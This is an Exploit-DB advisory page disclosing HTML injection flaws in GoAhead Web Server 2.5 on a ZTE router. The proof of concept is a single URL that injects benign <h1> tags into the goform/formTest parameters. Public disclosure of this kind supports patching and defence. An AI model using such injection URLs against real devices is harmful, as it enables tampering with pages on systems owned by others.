GoAhead Web Server 2.5 - 'goform/formTest' Multiple HTML Injection Vulnerabilities

EDB-ID:

51762

CVE:

N/A

EDB Verified:

Author:

Syed Affan Ahmed (ZEROXINN)

Type:

webapps

Exploit:   /  

Platform:

Multiple

Date:

2024-01-31

Vulnerable App: 
# Exploit Title: GoAhead Web Server 2.5 - 'goform/formTest' Multiple HTML Injection Vulnerabilities
# Date: 25/9/2023
# Exploit Author: Syed Affan Ahmed (ZEROXINN)
# Vendor Homepage: https://www.embedthis.com/goahead/
# Affected Version: 2.5 may be others.
# Tested On Version: 2.5 in ZTE AC3630

---------------------------POC---------------------------

GoAhead Web Server Version 2.5 is prone to Multiple HTML-injection vulnerabilities due to inadequate input validation.

HTML Injection can cause the ability to execute within the context of that site.

http://192.168.0.1/goform/formTest?name=<h1>Hello</h1>&address=<h1>World</h1>
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services